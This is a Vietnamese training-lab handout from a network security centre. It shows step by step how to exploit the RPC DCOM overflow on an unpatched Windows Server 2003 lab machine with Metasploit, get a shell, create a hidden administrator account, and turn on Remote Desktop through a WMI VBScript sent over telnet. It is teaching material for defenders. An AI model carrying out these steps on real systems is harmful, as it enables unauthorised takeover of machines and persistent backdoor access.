athena lab it

14
www.athena.edu.vn Tài liu thc hành Lab Trung tâm đào tạo an ninh mng ATHENA . www.athena.edu.vn 1 Lab : ng dng Metasploit Attack để khai thác các lhng trên mng 1. Chúng ta, người dùng thường ít ai quan tâm đến vic update cho máy ca mình hoc không update vì supdate slàm máy ngày càng chm chạp. Nhưng đối vi các hđiều hành thì thường phát sinh các li, HĐH bị lỗi không được update các bản vá và đây chính là cơ hội cho hacker có ththâm nhp chiếm quyn hthống máy người dùng. 2. Như vậy vic update các bn vá trnên hết sc quan trọng đối với người dùng. Bài lab dưới đây sẽ gii thiu một các đơn giản mà hacker có thli dụng để tn công vào các máy chưa được cp nht bn vá Mô hình : Mô hình đây gồm 2 máy trong cùng mt mng + Máy attacker : . Computer Name: DC1 . IP : 10.19.139.180 . OS: Windows Server 2003 + Máy Victim : . Computer Name: DC2 . IP : 10.19.139.181 . OS: Windows Server 2003 SP1 chưa update bản vá Tool sdng: Metasploit 3

Upload: khuc-anh-minh-luong

Post on 31-Aug-2014

83 views

Category:

Documents


5 download

TRANSCRIPT

Page 1: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 1

Lab : Ứng dụng Metasploit Attack để khai thác các lỗ

hổng trên mạng

1. Chúng ta, người dùng thường ít ai quan tâm đến việc update cho máy của mình

hoặc không update vì sợ update sẽ làm máy ngày càng chậm chạp. Nhưng đối

với các hệ điều hành thì thường phát sinh các lỗi, HĐH bị lỗi không được

update các bản vá và đây chính là cơ hội cho hacker có thể thâm nhập chiếm

quyền hệ thống máy người dùng.

2. Như vậy việc update các bản vá trở nên hết sức quan trọng đối với người dùng. Bài

lab dưới đây sẽ giới thiệu một các đơn giản mà hacker có thẻ lợi dụng để tấn công

vào các máy chưa được cập nhật bản vá

Mô hình :

Mô hình ở đây gồm 2 máy trong cùng một mạng

+ Máy attacker : . Computer Name: DC1

. IP : 10.19.139.180

. OS: Windows Server 2003

+ Máy Victim : . Computer Name: DC2

. IP : 10.19.139.181

. OS: Windows Server 2003 SP1 chưa update bản vá

Tool sử dụng: Metasploit 3

Page 2: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 2

Mục đích: Chiếm quền Administrator và Remote Desktop qua máy DC2

Thực hiện:

- Download tool Metaslpoit về : http://www.metasploit.com/framework/download/

- Tiến hành cài đặt Metasploit trên DC1

- Sau khi tiến trình cài đặt hoàn tất bạn chạy Metasploit GUI

Page 3: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 3

- Do máy DC2 chưa được update bản vá nên ta sẽ chọn bug : Microsoft RPC DCOM

Interface Overflow để khai thác .

- chọn Exploit Windows dcerpc . Và ta sẽ chọn bug : Microsoft RPC DCOM Interface

Overflow .

- Right click –> chọn Excute

- Chọn OS của Target(DC2) và chọn forward

Page 4: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 4

- Tiếp theo chọn shell để chèn vào máy victim . Ta chọn

windows/shell/shell_blind_tcp rồi bấm forward.

- Bước tiếp theo ta nhập ip của target vào :

Page 5: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 5

- Sau đó bạn chọn apply ở bước tiếp theo

- Sau khi apply thành công thì ta đã chèn thành công shell vào máy victim và tạo

session kết nối đến máy Victim(DC2).

- Tiếp theo ta chọn “Interact Session” để thực hiện việc tương tác đến máy victim và

chiếm quyền hệ thống của máy DC2

Page 6: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 6

- Việc kết nối shell trên máy victim đã hoàn tất

- Như vậy chúng ta đã ở trong shell trên máy victim với permission Administrator. Tiếp

theo chúng ta sẽ tạo 1 user và add user đó vào group Administrators:

C:\WINDOWS\system32>net user luongkhiem 123 /add

C:\WINDOWS\system32>net localgroup administrators luongkhiem /add

- Chúng ta đã chiếm thành công quyền hệ thống của máy DC2 và nhiệm vụ tiếp theo

là Remote Desktop và máy DC2. Đầu tiên ta kiểm tra coi máy victim có mở remote

desktop hay không bằng cách dùng lệnh netstat

Page 7: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 7

- Như vậy là máy victim ko có mở port 3339 . như vậy ta cần phải tìm cách open port

này .

- Trước tiên cần coi máy đang chạy những dịch vụ vào

C:\WINDOWS\system32>net start

These Windows services are started:

Application Layer Gateway Service

Automatic Updates

COM+ Event System

Computer Browser

Cryptographic Services

DHCP Client

Distributed File System

Distributed Link Tracking Client

Page 8: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 8

Distributed Transaction Coordinator

DNS Client

Error Reporting Service

Event Log

Help and Support

Internet Connection Firewall (ICF) / Internet Connect

IPSEC Services

Logical Disk Manager

Network Connections

Network Location Awareness (NLA)

NT LM Security Support Provider

Plug and Play

Print Spooler

Protected Storage

Remote Access Connection Manager

Remote Procedure Call (RPC)

Remote Registry

Secondary Logon

Security Accounts Manager

Server

Shell Hardware Detection

System Event Notification

Page 9: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 9

Task Scheduler

TCP/IP NetBIOS Helper

Telephony

Telnet

Terminal Services

VMware Tools Service

Windows Management Instrumentation

Windows Time

Wireless Configuration

Workstation

The command completed successfully.

- Như vậy là máy victim có chạy telnet ! ta telnet vào máy victim và mở port 3389

bằng đường telnet

C:\> telnet 10.19.139.181

*==================================================

=============

Welcome to Microsoft Telnet Server.

*==================================================

=============

C:\>ipconfig

Windows IP Configuration

Page 10: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 10

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 10.19.139.181

Subnet Mask . . . . . . . . . . . : 255.0.0.0

Default Gateway . . . . . . . . . : 10.19.128.1

C:\>copy con remote.vbs

machine = "."

cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"

query = "select * from Win32_TerminalServiceSetting"

value_to_set = 1 ' 0=off, 1=on

set cimv2 = GetObject( cimv2_string )

set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

Page 11: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 11

next^Z

1 file(s) copied.

C:\>dir

Volume in drive C has no label.

Volume Serial Number is C022-B43C

Directory of C:\

12/19/2008 10:36 PM 0 AUTOEXEC.BAT

12/19/2008 10:36 PM 0 CONFIG.SYS

12/28/2008 01:29 PM <DIR> Documents and Settings

12/27/2008 10:14 PM 0 lk.vbs

12/27/2008 10:32 PM 0 net

12/21/2008 09:48 PM <DIR> Program Files

12/28/2008 01:29 PM 321 remote.vbs

12/27/2008 07:40 PM <DIR> WINDOWS

12/19/2008 10:37 PM <DIR> wmpub

5 File(s) 321 bytes

4 Dir(s) 105,423,151,104 bytes free

C:\>remote.vbs

Page 12: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 12

C:\>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID

TCP 0.0.0.0:23 0.0.0.0:0 LISTENING 1140

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 700

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4

TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 528

TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 968

TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 752

TCP 10.19.139.181:23 10.19.139.180:3027 ESTABLISHED 1140

TCP 10.19.139.181:139 0.0.0.0:0 LISTENING 4

TCP 10.19.139.181:445 10.19.139.180:3024 ESTABLISHED 4

TCP 10.19.139.181:4444 10.19.139.180:3020 ESTABLISHED 700

TCP 127.0.0.1:3001 0.0.0.0:0 LISTENING 1272

TCP 127.0.0.1:3002 0.0.0.0:0 LISTENING 968

TCP 127.0.0.1:3003 0.0.0.0:0 LISTENING 968

UDP 0.0.0.0:445 *:* 4

UDP 0.0.0.0:500 *:* 528

UDP 0.0.0.0:1027 *:* 908

Page 13: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 13

UDP 0.0.0.0:3005 *:* 968

UDP 0.0.0.0:4500 *:* 528

UDP 10.19.139.181:123 *:* 968

UDP 10.19.139.181:137 *:* 4

UDP 10.19.139.181:138 *:* 4

UDP 127.0.0.1:123 *:* 968

- Như vậy chúng ta đã mở được port 3389

TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 752

- Remote Desktop vào máy DC2

C:\>mstsc

Như vậy là chúng ta đã remote desktop được máy victim . Từ đây có thể khai thác các

thông tin từ máy Victim. Đây là một lổ hổng nghiêm trọng .

Các bạn học viên cần lưu ý để biết cách fix các lổ hổng tương tự

Chúc các bạn thành công .

Page 14: Athena Lab it

www.athena.edu.vn

Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 14